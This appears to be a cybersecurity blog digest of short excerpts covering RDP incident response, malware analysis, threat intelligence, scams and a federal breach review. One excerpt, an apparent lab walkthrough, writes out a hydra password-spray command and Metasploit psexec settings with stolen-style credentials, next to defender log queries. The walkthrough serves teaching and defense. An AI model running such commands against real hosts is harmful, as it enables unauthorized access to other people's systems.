What is RDP, why is it a very nearly ubiquitous finding in incident response, and how can investigators run it to ground when it goes wrong? An Active Adversary Special Report.

Remote Desktop Protocol: The Series

Part 1: Remote Desktop Protocol: Introduction (post, video)
Part 2: Remote Desktop Protocol: Exposed RDP (is dangerous) (post, video)
Part 3: RDP: Queries for Investigation (post, video)
Part 4: RDP Time Zone Bias (post, video)
Part 5: Executing the External RDP Query (post, video)
Part 6: Executing the 4624_4625 Login Query (post, video)
GitHub query repository: SophosRapidResponse/OSQuery
Transcript repository: sophoslabs/video-transcripts
YouTube playlist: Remote Desktop Protocol: The Series

Remote Desktop Protocol (RDP) was developed by Microsoft to allow users, administrators, and others to connect to remote computers over a network connection using a handy graphical user interface (GUI).…


The list comprises 25 influential figures in the technology sector, arranged by age from youngest to oldest. These individuals are recognized for their significant contributions across various areas of technology, including internet innovations, software development, consumer electronics, and digital services.

Their work has not only transformed how we interact with technology on a daily basis but also laid foundational advancements that define the modern digital era.…

Must-Read Cybersecurity Blogs [List of Blogs & Websites]

1. Unsupervised Learning

An experienced cybersecurity expert, consultant and writer, Miessler takes a personal approach on his blog with an “about me” page that not only details his professional interests but also his hobbies, interests and political views. His offerings include newsletters and essays on a variety of topics and a podcast called Unsupervised Learning that focuses on security and artificial intelligence.…


Experience Level required: beginner

In this blog we will learn how to analyze MS Office macro-enabled documents.

1st sample: 8d15fadf25887c2c974e521914bb7cba762a8f03b1c97a2bc8198e9fb94d45a5
2nd sample: a9f8b7b65e972545591683213bb198c1767424423ecc8269833f6e784aa8bc99

Let’s look at the sample on VirusTotal.

37 of 63 security vendors detected this file as malicious.

Let’s open the file.

It uses a social engineering technique to persuade the user to enable the macros that lead to the infection of the user.…


Cyber threat intelligence (CTI) is a framework for collecting, processing, and analyzing information about potential or ongoing cyber threats.

Put simply, it’s the collection of various types of threat intelligence, such as IOCs, TTPs used by threat actors, and their motivations and capabilities, with the ultimate goal of understanding your system’s attack surface and proactively patching vulnerabilities.…

Attacker launches password spray

Attacker:
Password spray: hydra -L users.txt -P seasons-2023.txt 192.168.37.237 smb -u

Defender:
Count successful (4624) and failed (4625) logins:
Get-WinEvent -Path C:\labs\valkyrie-security-logons.evtx | Group-Object id -NoElement | sort count

Attacker uses sprayed credentials to attempt to log in via Metasploit’s psexec

Attacker:
msfconsole
msf6 > use exploit/windows/smb/psexec
msf6 > set RHOSTS 192.168.37.237
msf6 > set SMBUser fgaeta
msf6 > set SMBPass W1nter2023!…

We hear about “cyber attacks” in the news every week! But – what actually happens ‘during’ the attack, what happens in the background, behind the scenes, from the moment the event ‘begins’ until the moment it’s realized something is amiss? Or worse – when it’s not realized something is amiss and things continue on autopilot…

What’s In It For Me❓

In this blog post we’ll lay down the foundations of analyzing and reverse engineering Windows malicious files. We’ll…


A proxy server is an intermediary system that sits between end users and the websites or services they access online. It provides functions like web filtering, enhanced security, and data caching to improve network performance. Proxies also help in masking user IP addresses, enabling anonymous web browsing and managing internet usage within an organization.…


Check out our on-demand Annual Report webinar or read on for a summary of key topics and themes in the report.

2023 was a year in which cybercrime evolved in significant ways. Our 2023 annual report serves as a playbook of adversaries’ tactics, techniques, and procedures (TTPs) in 2023, with the goal of giving your security team a 360-degree view of the threat landscape.…


Online investment scams are no longer an issue confined to specific nations; they have become a social problem prevalent around the globe. Scammers (criminals) deceive their victims through illegal and immoral means, extorting financial assets, including cash and virtual assets, from them. They are usually part of a structured criminal syndicate, where they devise sophisticated scenarios to commit “transnational” fraud crimes.…


In this report, we will conduct a comprehensive analysis of Gafgyt, which is an ELF malware. Our aim is to examine the malware’s capabilities and determine its functions:

- DDoS attack capabilities
- Communication with the command and control (C&C) server
- Evading detection
- Network setup and configuration
- Process manipulation

Gafgyt malware, which is also known as Bashlite, has targeted millions of vulnerable IoT devices in the last few years.…


Those who have worked in our industry for a certain amount of time will be acutely aware that executives often encounter information security media articles and flag them to their teams. This is something that my peers at other organizations and I also face. So I decided to write about it, expand my thoughts, and offer some tips from my experience and research, to hopefully provide a practical solution for a common problem.…


The U.S. Department of Homeland Security released the Cyber Safety Review Board’s (CSRB) findings and recommendations following its independent review of the Summer 2023 Microsoft Exchange Online intrusion. The review detailed operational and strategic decisions that led to the intrusion and recommended specific practices for industry and government to implement to ensure an intrusion of this magnitude does not happen again.…
